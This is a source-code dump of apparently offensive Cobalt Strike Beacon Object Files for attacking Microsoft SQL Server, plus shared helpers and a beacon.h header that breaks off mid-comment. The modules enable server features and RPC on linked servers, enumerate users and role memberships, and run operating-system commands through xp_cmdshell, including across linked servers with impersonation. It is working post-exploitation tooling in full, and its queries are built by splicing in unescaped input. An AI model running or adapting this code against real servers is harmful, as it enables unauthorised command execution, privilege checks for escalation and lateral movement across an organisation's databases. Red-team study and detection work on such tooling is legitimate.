FILE: AD-BOF/SQL-BOF/src/SQL/togglemodule/entry.c
================================================
#include "base.c"
#include "bofdefs.h"
#include "sql.c"
#include "sql_modules.c"

void ToggleRpc(char *server, char *database, char *link, char *impersonate, char *value, char *user, char *password) {
  SQLHENV env = NULL;
  SQLHSTMT stmt = NULL;
  SQLHDBC dbc = NULL;

  dbc = ConnectToSqlServerAuth(&env, server, database, user, password);

  if (dbc == NULL) {
    goto END;
  }

  internal_printf("[*] Toggling RPC on %s...\n\n", link);

  ODBC32$SQLAllocHandle(SQL_HANDLE_STMT, dbc, &stmt);

  if (!ToggleModule(stmt, "rpc", value, link, impersonate)) {
    goto END;
  }

  ODBC32$SQLCloseCursor(stmt);

  if (!CheckRpcOnLink(stmt, link, impersonate)) {
    goto END;
  }

  PrintQueryResults(stmt, TRUE);

  ODBC32$SQLCloseCursor(stmt);

END:
  DisconnectSqlServer(env, dbc, stmt);
}

void ToggleGenericModule(char *server, char *database, char *link, char *impersonate, char *module, char *value, char *user, char *password) {
  SQLHENV env = NULL;
  SQLHSTMT stmt = NULL;
  SQLHDBC dbc = NULL;

  dbc = ConnectToSqlServerAuth(&env, server, database, user, password);

  if (dbc == NULL) {
    goto END;
  }

  ODBC32$SQLAllocHandle(SQL_HANDLE_STMT, dbc, &stmt);

  if (link == NULL) {
    internal_printf("[*] Toggling %s on %s...\n\n", module, server);
  } else {
    internal_printf("[*] Toggling %s on %s via %s\n\n", module, link, server);
  }

  if (!ToggleModule(stmt, module, value, link, impersonate)) {
    goto END;
  }

  ODBC32$SQLCloseCursor(stmt);

  CheckModuleStatus(stmt, module, link, impersonate);

  PrintQueryResults(stmt, TRUE);

END:
  ODBC32$SQLCloseCursor(stmt);
  DisconnectSqlServer(env, dbc, stmt);
}

VOID go(IN PCHAR Buffer, IN ULONG Length) {
  char *server;
  char *database;
  char *link;
  char *impersonate;
  char *module;
  char *value;
  char *user;
  char *password;

  datap parser;
  BeaconDataParse(&parser, Buffer, Length);

  server = BeaconDataExtract(&parser, NULL);
  database = BeaconDataExtract(&parser, NULL);
  link = BeaconDataExtract(&parser, NULL);
  impersonate = BeaconDataExtract(&parser, NULL);
  module = BeaconDataExtract(&parser, NULL);
  value = BeaconDataExtract(&parser, NULL);
  user = BeaconDataExtract(&parser, NULL);
  password = BeaconDataExtract(&parser, NULL);

  server = *server == 0 ? "localhost" : server;
  database = *database == 0 ? "master" : database;
  link = *link == 0 ? NULL : link;
  impersonate = *impersonate == 0 ? NULL : impersonate;
  user = *user == 0 ? NULL : user;
  password = *password == 0 ? NULL : password;

  if (!bofstart()) {
    return;
  }

  if (MSVCRT$strcmp(module, "rpc") == 0) {
    if (link == NULL) {
      internal_printf("[!] A link must be specified\n");
      printoutput(TRUE);
      return;
    }
    ToggleRpc(server, database, link, impersonate, value, user, password);
  }
  else {
    if (UsingLinkAndImpersonate(link, impersonate)) {
      return;
    }

    ToggleGenericModule(server, database, link, impersonate, module, value, user, password);
  }

  printoutput(TRUE);
};


================================================
FILE: AD-BOF/SQL-BOF/src/SQL/users/entry.c
================================================
#include "base.c"
#include "bofdefs.h"
#include "sql.c"

void CheckUsers(char *server, char *database, char *link, char *impersonate, char *user, char *password) {
  SQLHENV env = NULL;
  SQLHSTMT stmt = NULL;
  SQLHDBC dbc = NULL;
  char *query = NULL;
  SQLRETURN ret;

  if (link == NULL) {
    dbc = ConnectToSqlServerAuth(&env, server, database, user, password);
  } else {
    dbc = ConnectToSqlServerAuth(&env, server, NULL, user, password);
  }

  if (dbc == NULL) {
    goto END;
  }

  if (link == NULL) {
    internal_printf("[*] Enumerating users in the %s database on %s\n\n", database, server);
  } else {
    internal_printf("[*] Enumerating users in the %s database on %s via %s\n\n", database, link, server);
  }

  ret = ODBC32$SQLAllocHandle(SQL_HANDLE_STMT, dbc, &stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Failed to allocate statement handle\n");
    goto END;
  }

  char *prefix = "SELECT name AS username, create_date, modify_date, type_desc AS type, authentication_type_desc AS authentication_type FROM ";
  char *suffix = ".sys.database_principals WHERE type NOT IN ('A', 'R', 'X') AND sid IS NOT null ORDER BY username;";

  size_t totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(database) + MSVCRT$strlen(suffix) + 1;
  query = (char *)intAlloc(totalSize * sizeof(char));

  MSVCRT$strcpy(query, prefix);
  MSVCRT$strncat(query, database, totalSize - MSVCRT$strlen(query) - 1);
  MSVCRT$strncat(query, suffix, totalSize - MSVCRT$strlen(query) - 1);

  if (!HandleQuery(stmt, (SQLCHAR *)query, link, impersonate, FALSE)) {
    goto END;
  }

  PrintQueryResults(stmt, TRUE);

END:
  if (query != NULL)
    intFree(query);
  ODBC32$SQLCloseCursor(stmt);
  DisconnectSqlServer(env, dbc, stmt);
}

VOID go(IN PCHAR Buffer, IN ULONG Length) {
  char *server;
  char *database;
  char *link;
  char *impersonate;
  char *user;
  char *password;

  datap parser;
  BeaconDataParse(&parser, Buffer, Length);

  server = BeaconDataExtract(&parser, NULL);
  database = BeaconDataExtract(&parser, NULL);
  link = BeaconDataExtract(&parser, NULL);
  impersonate = BeaconDataExtract(&parser, NULL);
  user = BeaconDataExtract(&parser, NULL);
  password = BeaconDataExtract(&parser, NULL);

  server = *server == 0 ? "localhost" : server;
  database = *database == 0 ? "master" : database;
  link = *link == 0 ? NULL : link;
  impersonate = *impersonate == 0 ? NULL : impersonate;
  user = *user == 0 ? NULL : user;
  password = *password == 0 ? NULL : password;

  if (!bofstart()) {
    return;
  }

  if (UsingLinkAndImpersonate(link, impersonate)) {
    return;
  }

  CheckUsers(server, database, link, impersonate, user, password);

  printoutput(TRUE);
};

================================================
FILE: AD-BOF/SQL-BOF/src/SQL/whoami/entry.c
================================================
#include "base.c"
#include "bofdefs.h"
#include "sql.c"

void FreeResults(char **results) {
  for (int i = 0; results[i] != NULL; i++) {
    intFree(results[i]);
  }
  intFree(results);
}

void PrintMemberStatus(char *roleName, char *status) {
  if (status[0] == '0') {
    internal_printf(" |--> User is NOT a member of the %s role\n", roleName);
  } else {
    internal_printf(" |--> User is a member of the %s role\n", roleName);
  }
}

void Whoami(char *server, char *database, char *link, char *impersonate, char *user, char *password) {
  SQLHENV env = NULL;
  SQLHSTMT stmt = NULL;
  SQLHDBC dbc = NULL;
  char *sysUser = NULL;
  char *mappedUser = NULL;
  char **dbRoles = NULL;
  SQLRETURN ret;

  char *roles[] = {"sysadmin",     "setupadmin", "serveradmin", "securityadmin", "processadmin", "diskadmin",  "dbcreator",   "bulkadmin"};

  if (link == NULL) {
    dbc = ConnectToSqlServerAuth(&env, server, database, user, password);
  } else {
    dbc = ConnectToSqlServerAuth(&env, server, NULL, user, password);
  }

  if (dbc == NULL) {
    goto END;
  }

  if (link == NULL) {
    internal_printf("[*] Determining user permissions on %s\n", server);
  } else {
    internal_printf("[*] Determining user permissions on %s via %s\n", link, server);
  }

  ret = ODBC32$SQLAllocHandle(SQL_HANDLE_STMT, dbc, &stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Failed to allocate statement handle\n");
    goto END;
  }

  SQLCHAR *query = (SQLCHAR *)"SELECT SYSTEM_USER;";
  if (!HandleQuery(stmt, query, link, impersonate, FALSE)) {
    goto END;
  }
  sysUser = GetSingleResult(stmt, FALSE);
  internal_printf("[*] Logged in as %s\n", sysUser);

  ODBC32$SQLCloseCursor(stmt);

  query = (SQLCHAR *)"SELECT USER_NAME();";
  if (!HandleQuery(stmt, query, link, impersonate, FALSE)) {
    goto END;
  }
  mappedUser = GetSingleResult(stmt, FALSE);
  internal_printf("[*] Mapped to the user %s\n", mappedUser);

  ODBC32$SQLCloseCursor(stmt);

  internal_printf("[*] Gathering roles...\n");
  query = (SQLCHAR *)"SELECT [name] from sysusers where issqlrole = 1;";
  if (!HandleQuery(stmt, query, link, impersonate, FALSE)) {
    goto END;
  }
  dbRoles = GetMultipleResults(stmt, FALSE);

  ODBC32$SQLCloseCursor(stmt);

  for (int i = 0; dbRoles[i] != NULL; i++) {
    char *role = dbRoles[i];
    char *query = (char *)intAlloc(MSVCRT$strlen(role) + 32);
    MSVCRT$sprintf(query, "SELECT IS_MEMBER('%s');", role);
    if (!HandleQuery(stmt, query, link, impersonate, FALSE)) {
      goto END;
    }

    char *result = GetSingleResult(stmt, FALSE);
    PrintMemberStatus(role, result);

    intFree(query);
    intFree(result);

    ret = ODBC32$SQLCloseCursor(stmt);
    if (!SQL_SUCCEEDED(ret)) {
      internal_printf("[!] Failed to close cursor\n");
      goto END;
    }
  }

  for (int i = 0; i < sizeof(roles) / sizeof(roles[0]); i++) {
    char *role = roles[i];
    char *query = (char *)intAlloc(MSVCRT$strlen(role) + 32);
    MSVCRT$sprintf(query, "SELECT IS_SRVROLEMEMBER('%s');", role);
    if (!HandleQuery(stmt, query, link, impersonate, FALSE)) {
      goto END;
    }

    char *result = GetSingleResult(stmt, FALSE);
    PrintMemberStatus(role, result);

    intFree(query);
    intFree(result);

    ret = ODBC32$SQLCloseCursor(stmt);
    if (!SQL_SUCCEEDED(ret)) {
      internal_printf("[!] Failed to close cursor\n");
      goto END;
    }
  }

END:
  if (sysUser != NULL)
    intFree(sysUser);
  if (mappedUser != NULL)
    intFree(mappedUser);
  if (dbRoles != NULL)
    FreeResults(dbRoles);
  ODBC32$SQLCloseCursor(stmt);
  DisconnectSqlServer(env, dbc, stmt);
}

VOID go(IN PCHAR Buffer, IN ULONG Length) {
  char *server;
  char *database;
  char *link;
  char *impersonate;
  char *user;
  char *password;

  datap parser;
  BeaconDataParse(&parser, Buffer, Length);

  server = BeaconDataExtract(&parser, NULL);
  database = BeaconDataExtract(&parser, NULL);
  link = BeaconDataExtract(&parser, NULL);
  impersonate = BeaconDataExtract(&parser, NULL);
  user = BeaconDataExtract(&parser, NULL);
  password = BeaconDataExtract(&parser, NULL);

  server = *server == 0 ? "localhost" : server;
  database = *database == 0 ? "master" : database;
  link = *link == 0 ? NULL : link;
  impersonate = *impersonate == 0 ? NULL : impersonate;
  user = *user == 0 ? NULL : user;
  password = *password == 0 ? NULL : password;

  if (!bofstart()) {
    return;
  }

  if (UsingLinkAndImpersonate(link, impersonate)) {
    return;
  }

  if (user != NULL) {
    internal_printf("[*] SQL Auth user: %s\n", user);
  } else {
    internal_printf("[*] SQL Auth user: (not provided - using Windows auth)\n");
  }

  Whoami(server, database, link, impersonate, user, password);

  printoutput(TRUE);
};

================================================
FILE: AD-BOF/SQL-BOF/src/SQL/xpcmd/entry.c
================================================
#include "base.c"
#include "bofdefs.h"
#include "sql.c"
#include "sql_modules.c"

void ExecuteXpCmd(char *server, char *database, char *link, char *impersonate, char *command, char *user, char *password) {
  SQLHENV env = NULL;
  SQLHSTMT stmt = NULL;
  SQLHDBC dbc = NULL;
  char *query = NULL;
  size_t totalSize;
  SQLRETURN ret;
  unsigned int timeout = 10;

  if (link == NULL) {
    dbc = ConnectToSqlServerAuth(&env, server, database, user, password);
  } else {
    dbc = ConnectToSqlServerAuth(&env, server, NULL, user, password);
  }

  if (dbc == NULL) {
    goto END;
  }

  ret = ODBC32$SQLAllocHandle(SQL_HANDLE_STMT, dbc, &stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Failed to allocate statement handle\n");
    goto END;
  }

  if (IsModuleEnabled(stmt, "xp_cmdshell", link, impersonate)) {
    internal_printf("[*] xp_cmdshell is enabled\n");
  } else {
    internal_printf("[!] xp_cmdshell is not enabled\n");
    goto END;
  }

  ret = ODBC32$SQLCloseCursor(stmt);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Failed to close cursor\n");
    goto END;
  }

  if (link != NULL) {
    if (IsRpcEnabled(stmt, link)) {
      internal_printf("[*] RPC out is enabled\n");
    } else {
      internal_printf("[!] RPC out is not enabled\n");
      goto END;
    }

    ODBC32$SQLCloseCursor(stmt);
  }

  ret = ODBC32$SQLSetStmtAttr(stmt, SQL_ATTR_QUERY_TIMEOUT, (SQLPOINTER)(uintptr_t)timeout, 0);
  if (!SQL_SUCCEEDED(ret)) {
    internal_printf("[!] Failed to set query timeout\n");
    goto END;
  }

  internal_printf("[*] Executing system command...\n\n");

  if (link == NULL) {
    char *prefix = "EXEC xp_cmdshell '";
    char *suffix = "';";

    totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(command) + MSVCRT$strlen(suffix) + 1;
    query = (char *)intAlloc(totalSize * sizeof(char));

    MSVCRT$strcpy(query, prefix);
    MSVCRT$strncat(query, command, totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, suffix, totalSize - MSVCRT$strlen(query) - 1);

    printoutput(FALSE);

    if (!HandleQuery(stmt, (SQLCHAR *)query, link, impersonate, FALSE)) {
      goto END;
    }

    PrintQueryResults(stmt, TRUE);
  } else {
    char *prefix = "SELECT 1; EXEC master..xp_cmdshell '";
    char *suffix = "';";

    totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(command) + MSVCRT$strlen(suffix) + 1;
    query = (char *)intAlloc(totalSize * sizeof(char));

    MSVCRT$strcpy(query, prefix);
    MSVCRT$strncat(query, command, totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, suffix, totalSize - MSVCRT$strlen(query) - 1);

    printoutput(FALSE);

    if (!HandleQuery(stmt, (SQLCHAR *)query, link, impersonate, TRUE)) {
      goto END;
    }

    internal_printf("[*] Command executed (Output not returned for linked server cmd execution)\n");
  }

END:
  if (query != NULL)
    intFree(query);
  ODBC32$SQLCloseCursor(stmt);
  DisconnectSqlServer(env, dbc, stmt);
}

VOID go(IN PCHAR Buffer, IN ULONG Length) {
  char *server;
  char *database;
  char *link;
  char *impersonate;
  char *command;
  char *user;
  char *password;

  datap parser;
  BeaconDataParse(&parser, Buffer, Length);

  server = BeaconDataExtract(&parser, NULL);
  database = BeaconDataExtract(&parser, NULL);
  link = BeaconDataExtract(&parser, NULL);
  impersonate = BeaconDataExtract(&parser, NULL);
  command = BeaconDataExtract(&parser, NULL);
  user = BeaconDataExtract(&parser, NULL);
  password = BeaconDataExtract(&parser, NULL);

  server = *server == 0 ? "localhost" : server;
  database = *database == 0 ? "master" : database;
  link = *link == 0 ? NULL : link;
  impersonate = *impersonate == 0 ? NULL : impersonate;
  user = *user == 0 ? NULL : user;
  password = *password == 0 ? NULL : password;

  if (!bofstart()) {
    return;
  }

  if (UsingLinkAndImpersonate(link, impersonate)) {
    return;
  }

  ExecuteXpCmd(server, database, link, impersonate, command, user, password);

  printoutput(TRUE);
};

================================================
FILE: AD-BOF/SQL-BOF/src/common/base.c
================================================
#include "bofdefs.h"
#include "beacon.h"
#include "time.h"
#ifndef bufsize
#define bufsize 8192
#endif


char * output __attribute__((section (".data"))) = 0;  // this is just done so its we don't go into .bss which isn't handled properly
WORD currentoutsize __attribute__((section (".data"))) = 0;
HANDLE trash __attribute__((section (".data"))) = NULL; // Needed for x64 to not give relocation error

#ifdef BOF
int bofstart();
void internal_printf(const char* format, ...);
void printoutput(BOOL done);
#endif
char * Utf16ToUtf8(const wchar_t* input);
#ifdef BOF
int bofstart()
{   
    output = (char*)MSVCRT$calloc(bufsize, 1);
    currentoutsize = 0;
    return 1;
}

void internal_printf(const char* format, ...){
    int buffersize = 0;
    int transfersize = 0;
    char * curloc = NULL;
    char* intBuffer = NULL;
    va_list args;
    va_start(args, format);
    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); // +1 because vsprintf goes to buffersize-1 , and buffersize won't return with the null
    va_end(args);
    
    // vsnprintf will return -1 on encoding failure (ex. non latin characters in Wide string)
    if (buffersize == -1)
        return;
    
    char* transferBuffer = (char*)intAlloc(bufsize);
    intBuffer = (char*)intAlloc(buffersize);
    /*Print string to memory buffer*/
    va_start(args, format);
    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); // tmpBuffer2 has a null terminated string
    va_end(args);
    if(buffersize + currentoutsize < bufsize) // If this print doesn't overflow our output buffer, just buffer it to the end
    {
        //BeaconFormatPrintf(&output, intBuffer);
        memcpy(output+currentoutsize, intBuffer, buffersize);
        currentoutsize += buffersize;
    }
    else // If this print does overflow our output buffer, lets print what we have and clear any thing else as it is likely this is a large print
    {
        curloc = intBuffer;
        while(buffersize > 0)
        {
            transfersize = bufsize - currentoutsize; // what is the max we could transfer this request
            if(buffersize < transfersize) //if I have less then that, lets just transfer what's left
            {
                transfersize = buffersize;
            }
            memcpy(output+currentoutsize, curloc, transfersize); // copy data into our transfer buffer
            currentoutsize += transfersize;
            //BeaconFormatPrintf(&output, transferBuffer); // copy it to cobalt strikes output buffer
            if(currentoutsize == bufsize)
            {
            printoutput(FALSE); // sets currentoutsize to 0 and prints
            }
            memset(transferBuffer, 0, transfersize); // reset our transfer buffer
            curloc += transfersize; // increment by how much data we just wrote
            buffersize -= transfersize; // subtract how much we just wrote from how much we are writing overall
        }
    }
    intFree(intBuffer);
    intFree(transferBuffer);
}

void printoutput(BOOL done)
{

    char * msg = NULL;
    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
    currentoutsize = 0;
    memset(output, 0, bufsize);
    if(done) {MSVCRT$free(output); output=NULL;}
}
#else
#define internal_printf printf
#define printoutput 
#define bofstart 
#endif

// Changes to address issue #65.
// We can't use more dynamic resolve functions in this file, which means a call to HeapRealloc is unacceptable.
// To that end if you're going to use this function, declare how many libraries you'll be loading out of, multiple functions out of 1 library count as one
// Normallize your library name to uppercase, yes I could do it, yes I'm also lazy and putting that on the developer.
// Finally I'm going to assume actual string constants are passed in, which is to say don't pass in something to this you plan to free yourself
// If you must then free it after bofstop is called
#ifdef DYNAMIC_LIB_COUNT


typedef struct loadedLibrary {
    HMODULE hMod; // mod handle
    const char * name; // name normalized to uppercase
}loadedLibrary, *ploadedLibrary;
loadedLibrary loadedLibraries[DYNAMIC_LIB_COUNT] __attribute__((section (".data"))) = {0};
DWORD loadedLibrariesCount __attribute__((section (".data"))) = 0;

BOOL intstrcmp(LPCSTR szLibrary, LPCSTR sztarget)
{
    BOOL bmatch = FALSE;
    DWORD pos = 0;
    while(szLibrary[pos] && sztarget[pos])
    {
        if(szLibrary[pos] != sztarget[pos])
        {
            goto end;
        }
        pos++;
    }
    if(szLibrary[pos] | sztarget[pos]) // if either of these down't equal null then they can't match
        {goto end;}
    bmatch = TRUE;

    end:
    return bmatch;
}

//GetProcAddress, LoadLibraryA, GetModuleHandle, and FreeLibrary are gimmie functions
//
// DynamicLoad
// Retrieves a function pointer given the BOF library-function name
// szLibrary           - The library containing the function you want to load
// szFunction          - The Function that you want to load
// Returns a FARPROC function pointer if successful, or NULL if lookup fails
//
FARPROC DynamicLoad(const char * szLibrary, const char * szFunction)
{
    FARPROC fp = NULL;
    HMODULE hMod = NULL;
    DWORD i = 0;
    DWORD liblen = 0;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        if(intstrcmp(szLibrary, loadedLibraries[i].name))
        {
            hMod = loadedLibraries[i].hMod;
        }
    }
    if(!hMod)
    {
        hMod = LoadLibraryA(szLibrary);
        if(!hMod){ 
            BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\nCould not find library to load.", szLibrary);
            return NULL;
        }
        loadedLibraries[loadedLibrariesCount].hMod = hMod;
        loadedLibraries[loadedLibrariesCount].name = szLibrary; //And this is why this HAS to be a constant or not freed before bofstop
        loadedLibrariesCount++;
    }
    fp = GetProcAddress(hMod, szFunction);

    if (NULL == fp)
    {
        BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\n", szFunction);
    }
    return fp;
}
#endif


char* Utf16ToUtf8(const wchar_t* input)
{
    int ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        NULL,
        0,
        NULL,
        NULL
    );

    char* newString = (char*)intAlloc(sizeof(char) * ret);

    ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        newString,
        sizeof(char) * ret,
        NULL,
        NULL
    );

    if (0 == ret)
    {
        goto fail;
    }

retloc:
    return newString;
/*location to free everything centrally*/
fail:
    if (newString){
        intFree(newString);
        newString = NULL;
    };
    goto retloc;
}

//release any global functions here
void bofstop()
{
#ifdef DYNAMIC_LIB_COUNT
    DWORD i;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        FreeLibrary(loadedLibraries[i].hMod);
    }
#endif
	return;
}

void InitRandomSeed()
{
    MSVCRT$srand((unsigned int)MSVCRT$time(NULL));
}

//
// Helper func to generate random strings for prodecure names, etc
//
char* GenerateRandomString(int length)
{
    char* result = (char*)intAlloc(length + 1);
    for (int i = 0; i < length; i++)
    {
        result[i] = (char)(MSVCRT$rand() % 26 + 97);
    }
    result[length] = '\0';
    return result;
}

================================================
FILE: AD-BOF/SQL-BOF/src/common/beacon.h
================================================
/*
 * Beacon Object Files (BOF)
 * -------------------------
 * A Beacon Object File is a light-weight post exploitation tool that runs
 * with Beacon's inline-execute command.
 *
 * Additional BOF resources are available here:
 *   - https://github.com/Cobalt-Strike/bof_template
 *
 * Cobalt Strike 4.x
 * ChangeLog:
 *    1/25/2022: updated for 4.5
 *    7/18/2023: Added BeaconInformation API for 4.9
 *    7/31/2023: Added Key/Value store APIs for 4.9
 *                  BeaconAddValue, BeaconGetValue, and BeaconRemoveValue
 *    8/31/2023: Added Data store APIs for 4.9
 *                  BeaconDataStoreGetItem, BeaconDataStoreProtectItem,
 *                  BeaconDataStoreUnprotectItem, and BeaconDataStoreMaxEntries
 *    9/01/2023: Added BeaconGetCustomUserData API for 4.9
 *    3/21/2024: Updated BeaconInformation API for 4.10 to return a BOOL
 *               Updated the BEACON_INFO data structure to add new parameters
 *    4/19/2024: Added BeaconGetSyscallInformation API for 4.10
 *    4/25/2024: Added APIs to call Beacon's system call implementation
 *    12/18/2024: Updated BeaconGetSyscallInformation API for 4.11 (Breaking changes)
 *    2/13/2025: Updated SYSCALL_API structure with more ntAPIs for 4.11
 *    3/20/2025: Updated ALLOCATED_MEMORY_SECTION structure with driploader page size for 4.12
 *    4/7/2025: Updated ALLOCATED_MEMORY_REGION structure with driploader allocation granularity for 4.12
 *    7/16/2025: Updated ALLOCATED_MEMORY_PURPOSE structure with PURPOSE_UDC2_MEMORY for 4.12
 */
#ifndef _BEACON_H_
#define _BEACON_H_
#include <windows.h>

#ifdef __cplusplus
extern "C" {
#endif // __cplusplus

/* data API */
typedef struct {
	char * original; /* the original buffer [so we can free it] */
	char * buffer;   /* current pointer into our buffer */
	int    length;   /* remaining length of data */
	int    size;     /* total size of this buffer */
} datap;

DECLSPEC_IMPORT void    BeaconDataParse(datap * parser, char * buffer, int size);
DECLSPEC_IMPORT char *  BeaconDataPtr(datap * parser, int size);
DECLSPEC_IMPORT int     BeaconDataInt(datap * parser);
DECLSPEC_IMPORT short   BeaconDataShort(datap * parser);
DECLSPEC_IMPORT int     BeaconDataLength(datap * parser);
DECLSPEC_IMPORT char *  BeaconDataExtract(datap * parser, int * size);

/* format API */
typedef struct {
	char * original; /* the original buffer [so we can free it] */
	char * buffer;   /* current pointer into our buffer */
	int    length;   /* remaining length of data */
	int    size;     /* total size of this buffer */
} formatp;

DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp * format, int maxsz);
DECLSPEC_IMPORT void    BeaconFormatReset(formatp * format);
DECLSPEC_IMPORT void    BeaconFormatAppend(formatp * format, const char * text, int len);
DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp * format, const char * fmt, ...);
DECLSPEC_IMPORT char *  BeaconFormatToString(formatp * format, int * size);
DECLSPEC_IMPORT void    BeaconFormatFree(formatp * format);
DECLSPEC_IMPORT void    BeaconFormatInt(formatp * format, int value);

/* Output Functions */
#define CALLBACK_OUTPUT      0x0
#define CALLBACK_OUTPUT_OEM  0x1e
#define CALLBACK_OUTPUT_UTF8 0x20
#define CALLBACK_ERROR       0x0d
#define CALLBACK_CUSTOM      0x1000
#define CALLBACK_CUSTOM_LAST 0x13ff


DECLSPEC_IMPORT void   BeaconOutput(int type, const char * data, int len);
DECLSPEC_IMPORT void   BeaconPrintf(int type, const char * fmt, ...);
DECLSPEC_IMPORT BOOL   BeaconDownload(const char * filename, const char* buffer, unsigned int length);


/* Token Functions */
DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
DECLSPEC_IMPORT void   BeaconRevertToken();
DECLSPEC_IMPORT BOOL   BeaconIsAdmin();

/* Spawn+Inject Functions */
DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char * buffer, int length);
DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len);
DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len);
DECLSPEC_IMPORT BOOL   BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo);
DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION * pInfo);

/* Utility Functions */
DECLSPEC_IMPORT BOOL   toWideChar(char * src, wchar_t * dst, int max);

/* Beacon Information */
/*
 *  ptr  - pointer to the base address of the allocated memory.
 *  size - the number of bytes allocated for the ptr.
 */
typedef struct {
	char * ptr;
	size_t size;
} HEAP_RECORD;
#define MASK_SIZE 13

/* Information the user can set in the USER_DATA via a UDRL */
typedef enum {
	PURPOSE_EMPTY,
	PURPOSE_GENERIC_BUFFER,
	PURPOSE_BEACON_MEMORY,
	PURPOSE_SLEEPMASK_MEMORY,
	PURPOSE_BOF_MEMORY,
	PURPOSE_UDC2_MEMORY,
	PURPOSE_USER_DEFINED_MEMORY = 1000
} ALLOCATED_MEMORY_PURPOSE;

typedef enum {
	LABEL_EMPTY,
	LABEL_BUFFER,
	LABEL_PEHEADER,
	LABEL_TEXT,
	LABEL_RDATA,
	LABEL_DATA,
	LABEL_PDATA,
	LABEL_RELOC,
	LABEL_USER_DEFINED = 1000
} ALLOCATED_MEMORY_LABEL;

typedef enum {
	METHOD_UNKNOWN,
	METHOD_VIRTUALALLOC,
	METHOD_HEAPALLOC,
	METHOD_MODULESTOMP,
	METHOD_NTMAPVIEW,
	METHOD_USER_DEFINED = 1000,
} ALLOCATED_MEMORY_ALLOCATION_METHOD;

/**
* This structure allows the user to provide additional information
* about the allocated heap for cleanup. It is mandatory to provide
* the HeapHandle but the DestroyHeap Boolean can be used to indicate
* whether the clean up code should destroy the heap or simply free the pages.
* This is useful in situations where a loader allocates memory in the
* processes current heap.
*/
typedef struct _HEAPALLOC_INFO {
	PVOID HeapHandle;
	BOOL  DestroyHeap;
} HEAPALLOC_INFO, *PHEAPALLOC_INFO;

typedef struct _MODULESTOMP_INFO {
	HMODULE ModuleHandle;
} MODULESTOMP_INFO, *PMODULESTOMP_INFO;

typedef union _ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION {
	HEAPALLOC_INFO HeapAllocInfo;
	MODULESTOMP_INFO ModuleStompInfo;
	PVOID Custom;
} ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION, *PALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION;

typedef struct _ALLOCATED_MEMORY_CLEANUP_INFORMATION {
	BOOL Cleanup;
	ALLOCATED_MEMORY_ALLOCATION_METHOD AllocationMethod;
	ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION AdditionalCleanupInformation;
} ALLOCATED_MEMORY_CLEANUP_INFORMATION, *PALLOCATED_MEMORY_CLEANUP_INFORMATION;

typedef struct _ALLOCATED_MEMORY_SECTION {
	ALLOCATED_MEMORY_LABEL Label; // A label to simplify Sleepmask development
	PVOID  BaseAddress;           // Pointer to virtual address of section
	SIZE_T VirtualSize;           // Virtual size of the section
	DWORD  CurrentProtect;        // Current memory protection of the section
	DWORD  PreviousProtect;       // The previous memory protection of the section (prior to masking/unmasking)
	BOOL   MaskSection;           // A boolean to indicate whether the section should be masked
	DWORD  DripLoadPageSize;      // The page size used when committing memory during drip-loading
} ALLOCATED_MEMORY_SECTION, *PALLOCATED_MEMORY_SECTION;

typedef struct _ALLOCATED_MEMORY_REGION {
	ALLOCATED_MEMORY_PURPOSE Purpose;      // A label to indicate the purpose of the allocated memory
	PVOID  AllocationBase;                 // The base address of the allocated memory block
	SIZE_T RegionSize;                     // The size of the allocated memory block
	DWORD Type;                            // The type of memory allocated
	DWORD DripLoadAllocationGranularity;   // The allocation granularity used when reserving memory for drip-loading
	ALLOCATED_MEMORY_SECTION Sections[8];  // An array of section information structures
	ALLOCATED_MEMORY_CLEANUP_INFORMATION CleanupInformation; // Information required to cleanup the allocation
} ALLOCATED_MEMORY_REGION, *PALLOCATED_MEMORY_REGION;

typedef struct {
	ALLOCATED_MEMORY_REGION AllocatedMemoryRegions[6];
} ALLOCATED_MEMORY, *PALLOCATED_MEMORY;

/*
 *  version               - The version of the beacon dll was added for release 4.10
 *                          version format: 0xMMmmPP, where MM = Major, mm = Minor, and PP = Patch
 *                          e.g. 0x040900 -> CS 4.9
 *                               0x041000 -> CS 4.10
 *
 *  sleep_mask_ptr        - pointer to the sleep mask base address
 *  sleep_mask_text_size  - the sleep mask text section size
 *  sleep_mask_total_size - the sleep mask total memory size
 *
 *  beacon_ptr   - pointer to beacon's base address
 *                 The stage.obfuscate flag affects this value when using CS default loader.
 *                    true:  beacon_ptr = allocated_buffer - 0x1000 (Not a valid address)
 *                    false: beacon_ptr = allocated_buffer (A valid address)
 *                 For a UDRL the beacon_ptr will be set to the 1st argument to DllMain
 *                 when the 2nd argument is set to DLL_PROCESS_ATTACH.
 *  heap_records - list of memory addresses on the heap beacon wants to mask.
